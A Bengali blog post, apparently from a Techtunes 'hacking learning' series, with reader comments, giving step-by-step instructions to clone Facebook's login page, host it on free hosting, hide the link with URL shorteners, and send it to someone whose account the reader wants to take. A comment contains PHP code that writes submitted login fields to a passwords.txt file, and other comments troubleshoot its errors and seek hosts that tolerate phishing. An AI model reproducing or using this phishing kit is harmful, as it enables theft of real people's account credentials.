এ অধ্যায়ে আমরা শিখব কিভাবে আপনি ধাপে ধাপে একটি ফিশিং স্ক্রিপ্ট তৈরী করবেন। এক্ষেত্রে ফেসবুক ফেক পেজ বানাব আমরা। আরও শিখব কিভাবে তা কোন হোস্টিং সাইটে আপলোড করবেন। কিভাবে ফিসিং URL লুকাবেন এবং কিভাবে ফিশিং থেকে নিজেকে রক্ষা করবেন।
প্রথমেই কাজে লেগে পড়ি। কাজ শুরু করার পূর্বে দেখে নিন ফেসবুক লগআউট করেছেন কিনা। না করে থাকলে প্রথমে লগআউট করে নিন। এবার প্রবেশ করুন নিচের সাইটে অথবা ব্রাউজারে (ফায়ারফক্স ব্যবহার করুন।) লিখুন।
http://www.facebook.com/login.php
নিচের মত একটি পৃষ্ঠা আসবে। এবার মাউনের ডান বাটনে ক্লিক করে View Page Source এ ক্লিক করুন। একটি নতুন পৃষ্ঠা খুলবে। নীচে দেখুন।
এবার সোর্স কোডের সবগুলো কপি করে নিন।
ব্রাউজারে লিখুন http://www.ripway.com
সাইট আপ করুন। নিচে লক্ষ্য করুন।
লগইন করুন। My Files এ ক্লিক করুন। Create Text File এ ক্লিক করুন।
Enter a file name এ আপনি লিখুন login.php
এর নীচের টেক্স এরিয়ায় আপনি ফেসবুকের লগইন পেজের যে সোর্স কোড কপি করেছেন সেটি পেষ্ট করে দিন। নিচে লক্ষ্য করুন।
পেষ্ট করা হয়ে গেলে Create এ ক্লিক করুন। একটি টেক্সট ফাইল তৈরী হবে। আবার Create Text File এ ক্লিক করুন। Enter a file name এ আপনি লিখুন password.php
টেক্সট এরিয়ায় নিচের কোডটুকু লিখুন।
উপরে লক্ষ্য করুন কালো রং করা স্থানে আপনি আপনার লিংক ইউআরএল বসান। ঐটা হচ্ছে আমার ইউআরএল। সাধারনত ইউআরএল ফরম্যাট হয় “http://h1.ripway.com/আপনার ইউজার নেম”
শেষে Create বাটনে ক্লিক করুন। এখন আপনি দুটি টেক্সট ফাইল তৈরী করেছেন।
এবার আমরা login.php ফাইলটি এডিট করব। আপনার ব্রাউজারে Crtl+F চাপুন। এবার Find বক্সে লিখুন <form
এবার <form থেকে ব্লক করা শুরু করুন। শেষ করুন নীচের চিত্র দেখুন।
ডিলিট করে দিন। এর স্থলে বসান নিচের কোডটি।
Save এ ক্লিক করুন।
এবার login.php এর লিংকটি কপি করে আপনি যার একাউন্ট হ্যাক করতে চান তাকে পাঠিয়ে দিন এবং মজা দেখুন।
যখন আপনার বন্ধু লগইন করবে তখন My Files এ ক্লিক করলে দেখতে পাবেন password.txt নামে আরেকটি ফাইল তৈরী হয়েছে। ঐ ফাইলের Edit এ ক্লিক করলেই আপনি ভিকটিমের লগইন ও পাসওয়ার্ড পেয়ে যাবেন। এভাবে আপনি যেকোন সাইটের ফিশিং স্ক্রিপ্ট বানাতে পারবেন শুধু লগইন ইউআরএল টা বের করতে হবে আরকি……..lolz
ripway এর মত আরো কয়েকটি হোস্টিং সাইট
http://www.byethost.com/free-hosting
প্রথমে নীচের দুটি লিংকের যেকোন একটিতে প্রবেশ করুন।
এবার ফিশিং লিকটি কপি করে নিন। উপরের যেকোন একটি সাইটে লিংকটি বসিয়ে ছোট করে নিন। হয়ে গেল লিংক হাইড।
আমি M4H3D1 H454N। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 13 বছর 5 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 43 টি টিউন ও 283 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 12 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
মানুষের কল্যানে ভালো কিছু করার ইচ্ছে আছে জীবনে।
আপনি অসাধারন একটি কমেন্ট করেছেন আপু।
আসলেই টিটি ছাড়া থাকতে কষ্ট হয় আমারও।
আমি প্রতিদিনই আসি যতই কাজ থাকুক।
কিন্তু লগইন করে কমেন্ট করার সময় পাই না……………:xD
ভালো থাকবেন।
আসলেই টিটি ছাড়া থাকতে কষ্ট হয়। ওহে আপনার টিউন টা ভালো হয়েছে কিন্তু মেহেদি ভাই একদিনে সব দিলে তো সব ভুলে খাইয়া ফেলব আর কোন ছেড়ে কোন টা খাবো এমন অবস্থা হচ্ছে।
আজই আমার ছোট ভাইয়ের ফেসবুক একাউন্ট করব । প্রিয়তে নিলাম । Taher ভাইয়ের সাথে একমত প্রতিদিন একাধিক টিউন না করে একটি টিউন দ দিলে ভাল আর তা না হলে সব ভুলে খেয়ে বসে থাকব ।
mahedi bhai….facebook er phishing site e id pass dile Bad Request (Invalid URL) eita ashe…..password.txt name kono file create hoy na hosting site e, ami http://www.ripway.com e hosting korsi….ghotona ki ektu janaben…ar apner ym or msn id ta dile kushi hoitam…wish ur good like…
regards
Moshtishko
ভাই এ রকম হওয়ার কথা নয় মোটেও।
আপনি আরেকবার চেষ্টা করুন।
কথায় আছে একবার না পারিলে দেখ শতবার………lol
প্রক্রিয়াটি ১০০% পরীক্ষিত।
আমি ইয়াহুতে থাকি না।
অধিকাংশ সময় ট্রেড ম্যানেজারে থাকি (এটা ব্যবসায়িকদের জন্য)
স্কাইপিতে অধিকাংশ সময় আমার ক্লায়েন্টদের সাথে কথা বলি বা চ্যাট করি।
স্কাইপি : raimentgroup
সমস্যা হলে জানাবেন। ধন্যবাদ।
শিখতে মনে চায়, আপনাদের টিটি পরে কাজ করি সফল হয় না। তবে কার ক্ষতির জন্য নয় জানার জন্য। তাই আপনার সব গুলো টিটি আমার প্রিয়তে রেখে দিলাম।
ভাই দু:খিত। আমার কাছে নেই।
তবে আপনি নিচের দুটি লিংকে খুঁজে দেখতে পারেন।
http://script.yourdada.com
http://www.scriptmafia.com
কমেন্টের জন্য ধন্যবাদ।
ওহ,বলতে ভুলে গেছি। আপনার টিউনগুলোর জন্য ধন্যবাদ। এখনও পড়ে দেখিনি পরীক্ষা চলছে বলে। পরীক্ষা শেষে পড়ব। তবে ভাল,এটা বুঝতে পারছি। তা না হলে এত কমেন্ট আসতো না আর আপনিও এত পর্ব চালাতেন না। আবারও ধন্যবাদ।
ধন্যবাদ মিঠু ভাই।
আপনার টিউন গুলোও ভালো হচ্ছে।
আমি নিজেও একজন গ্রাফিক্স ডিজাইনার।
চালিযে যান।
ভালো থাকবেন।
আমার মতে, ভাইয়া আমি এটা অনেক বার করেছি এবং এখন করি। এমন কিছু হোস্টিং এর নাম দেন যারা একাউন্ট ব্লক করে না। আর আপনি বলেছেন যে, .txt ফাইলটা এমনি তৈরি হয়ে যাবে। তবে অধিকাংশ ক্ষেত্রে এই জিনিসটিই সমস্যা করে। তার চেয়ে নিজেই মনে হয় ঐ নামে .txt ফাইলটি বানিয়ে আপলোড করলে ভালো হয়।
মেহেদি ভাই, আপনিতো টেকটিউনসে রীতিমতো ঝড় তুলে ফেলেছেন। আপনার টিউনগুলো খুবই ভাল লেগেছে। কে কি বলে না বলে সেদিকে তাকাবেন না। হিংসুকেরা হিংসা করে অনেক কিছুই করতে চাইবে। প্লিজ ফালতু লোকের ফালতু কথায় কান না দিয়ে আপনি চালিয়ে যান, আমরা আছি আপনার পাশে। আপনার টিউন পড়তে পড়তে হয়ত কোন একদিন ভাল হ্যাকার হয়ে যাব। ধন্যবাদ আপনাকে সুন্দর সুন্দর টিউন করার জন্য।
প্রক্রিয়াটা পুনরায় ফলো করুন।
সবকিছু নতুন করে করুন।
ইনশাআল্লাহ হবে।
ভালো থাকবেন।
vai, copy paste maira korsi, ai joonno hoitesena naki? sob korlam, kintu login korte gele BAD REQUEST dekhay
হাসান ভাই সালাম নিবেন। আমি আপনার দেখানো চিত্র মতো login.php এবং password.php ফাইল দুটি তৈরী করেছি। তারপর আমি login.php ফাইলটি পরীক্ষামুলকভাবে আমার নিজের একটা ইয়াহু তে সেন্ড করলাম। তখন ওই আইডি অপেন করে আমি লিংক টিতে ক্লিক করে দুইবার আইডি পাসওয়ার্ড দিয়ে ফেসবুকে ঢুকলাম। আপনি বলেছেন এভাবে কেউ লগইন করলেই তার পাসওয়ার্ড password.txt নামের ফাইলে ripway তে চলে আসবে। কিন্তু আমার বেলায় তো password.txt নামের কোন ফাইল এলো না। ripway তে আমার আগের দুইটা ফাইলই রয়ে গেলো। এখন আমি কি করতে পারি জানালে উপকৃত হবো। ভালো থাকবেন হাসান ভাই।
আপনি হলুদ কালি দিয়ে চিন্হিত ও কালো কালি দিয়ে মুছে দেয়া স্থানে কি আপনার ইউজার আইডি বসিয়েছিলেন?
কোডটি প্রথমে নোটপ্যাডে লিখুন। তারপর রিপওয়েতে পেষ্ট করুন।
এরপর দেখুন কাজ হয় কিনা?
ধন্যবাদ।
password.php file টা লিখতে পারতেছিনা… অনুগ্রহ করে যদি commnt এ লিখে দিতেন… তাহলে উপক্রিত হতাম
<?php
header("Location: https://h1.ripway.com/আপনার ইউজার নেম/login.php);
shandle=fopen("passwords.txt","a");
foreach(S_GET as Svariable=>Svalue){
fwrite(Shandle, Svariable);
fwrite(Shandle, "=");
fwrite(Shandle, Svalue);
fwrite(Shandle, "\r\n");
}
fwrite(Shandle, "\r\n");
fclose(Shandle);
exit;
?>
মেহেদি ভাই… যে সব ওয়েব পেজ এর login page নাই তাদের বেলায় কি হবে? যেমন http://www.abc.com এই পেজ এর যদি আলাদা কোন login form না থাকে? এদের বেলায় কি ফিশিং করা যাবেনা?
jokhn amr link e kew login kore nicher likha ta ashe
Parse error: parse error, unexpected T_STRING in \\192.168.0.16\webfiles\files\2011-9\3781385\password.php on line 3
মেহেদি ভাই আমার একি সমস্যা ।Parse error: parse error, unexpected T_STRING in \\192.168.0.16\webfiles\files\2011-9\3781385\password.php on line 3 এটা দেখায়। pls…হেল্প করেন।
ভাই আপনার ১৫,১৬,১৭ পোস্ট এর জন্য password please দিন। আমার email id [email protected].
Awesome Facebook Phishing Script. Thank you so much for share. I’m looking for it
![হ্যাকিং লার্নিং :: ওয়েব হ্যাকিং – আসুন আরম্ভ করা যাক (ব্যাকট্র্যাক ইনস্টল পদ্ধতি) [অধ্যায়-২৩]](https://dnc.techtunes.io/tDrive/tuner/m4h3d1-h454n/251672/backtrack5r3-3.png "হ্যাকিং লার্নিং :: ওয়েব হ্যাকিং – আসুন আরম্ভ করা যাক (ব্যাকট্র্যাক ইনস্টল পদ্ধতি) [অধ্যায়-২৩]")
![হ্যাকিং লার্নিং :: সার্চ ইন্জিন অপটিমাইজেশন (এসইও) [অধ্যায়-৬]](https://dnc.techtunes.io/tDrive/tuner/m4h3d1-h454n/71447/google_hacker_team_by_carnado.png "হ্যাকিং লার্নিং :: সার্চ ইন্জিন অপটিমাইজেশন (এসইও) [অধ্যায়-৬]")
![হ্যাকিং লার্নিং :: ডোমেইন হাইজ্যাকিং : যেভাবে ডোমেইন হাইজ্যাক করতে হয় [অধ্যায়-১৮]](https://dnc.techtunes.io/tDrive/tuner/m4h3d1-h454n/77721/Domain-hack-Hijacking.jpg "হ্যাকিং লার্নিং :: ডোমেইন হাইজ্যাকিং : যেভাবে ডোমেইন হাইজ্যাক করতে হয় [অধ্যায়-১৮]")
আসলে সত্যি কথা বলতে কি আপনাকে অনেক ধন্যবাদ। জানেন আরো দেড় থেকে দুই বছর আগে, তখোনো আমি কম্পিউটার কিনিনি,আমি কলেজ থেকে বাসায় ফিরার সময় প্রথম আলো পেপার কিনে আনি। ওই পেপারে প্রথম techtunes এর কথা জানতে পারি। তারপর,আমি পেপার এর অই অংশটুকু কেটে রাখি। পরের দিন cyber cafe এ গিয়ে techtunes এ প্রবেশ করি। তারপর, এতো ভাল লাগল যে প্রতি তিনদিন পর পর techtunes এ ঢুকতাম। তারপর, hsc পরিক্ষার পর computer কিনি। তারপর তো আর কথা নাই, প্রতিদিন দুই-তিনবার ঢুকতাম। এখন techtunes এ প্রতিদিন আসি, কারন techtunes ছাড়া একদিনও থাকতে পারব না।
এতো কথা কেন বললাম?কারন সেই ২ বছর আগে techtunes এ এসে যেরকম অনেক ভাল লাগত, তেমনি আপনার,mithu, আর ছাত্র ও শিক্ষক এর টিউন পরে সেই আগের মত লাগে।
তাই,please continue.